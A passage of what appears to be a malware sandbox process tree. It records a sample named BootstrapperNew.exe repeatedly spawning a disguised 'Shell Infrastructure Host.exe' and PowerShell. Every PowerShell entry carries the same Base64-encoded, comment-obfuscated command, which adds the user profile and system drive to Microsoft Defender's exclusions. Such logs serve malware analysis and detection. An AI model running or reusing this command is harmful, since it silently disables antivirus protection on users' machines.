        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        284⤵
        
        PID:2076
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        284⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        284⤵
        
        PID:6748
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        285⤵
        
        PID:4620
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        285⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        285⤵
        
        PID:2192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        286⤵
        
        PID:1036
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        286⤵
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        286⤵
        
        PID:5872
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        287⤵
        
        PID:5184
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        287⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        287⤵
        
        PID:6568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        288⤵
        
        PID:1404
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        288⤵
        
        PID:6044
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        288⤵
        
        PID:1084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        289⤵
        
        PID:8188
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        289⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        289⤵
        
        PID:6848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        290⤵
        
        PID:1308
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        290⤵
        
        PID:1236
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        290⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        291⤵
        
        PID:7480
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        291⤵
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        291⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        292⤵
        
        PID:5672
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        292⤵
        
        PID:7532
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        292⤵
        
        PID:4940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        293⤵
        
        PID:6936
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        293⤵
        
        PID:8152
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        293⤵
        
        PID:6364
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        294⤵
        
        PID:5620
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        294⤵
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        294⤵
        
        PID:4700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        295⤵
        
        PID:7304
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        295⤵
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        295⤵
        
        PID:7460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        296⤵
        
        PID:3872
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        296⤵
        
        PID:6748
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        296⤵
        
        PID:6096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        297⤵
        
        PID:3860
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        297⤵
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        297⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        298⤵
        
        PID:5008
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        298⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        298⤵
        
        PID:1412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        299⤵
        
        PID:7488
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        299⤵
        
        PID:6616
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        299⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        300⤵
        
        PID:2952
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        300⤵
        
        PID:1176
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        300⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        301⤵
        
        PID:4676
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        301⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        301⤵
        
        PID:7516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        302⤵
        
        PID:2192
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        302⤵
        
        PID:7892
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        302⤵
        
        PID:7900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        303⤵
        
        PID:1976
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        303⤵
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        303⤵
        
        PID:1228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        304⤵
        
        PID:7432
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        304⤵
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        304⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        305⤵
        
        PID:6628
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        305⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        305⤵
        
        PID:5440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        306⤵
        
        PID:7000
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        306⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        306⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        307⤵
        
        PID:8044
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        307⤵
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        307⤵
        
        PID:1176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        308⤵
        
        PID:6120
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        308⤵
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        308⤵
        
        PID:2236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        309⤵
        
        PID:7560
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        309⤵
        
        PID:6680
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        309⤵
        
        PID:8184
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        310⤵
        
        PID:5108
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        310⤵
        
        PID:5704
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        310⤵
        
        PID:7828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdgBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAeQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAZABtACMAPgA="
        311⤵
        
        PID:4964
        
        C:\Windows\Shell Infrastructure Host.exe
        
        "C:\Windows\Shell Infrastructure Host.exe"
        311⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        311⤵
        
        PID:4256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
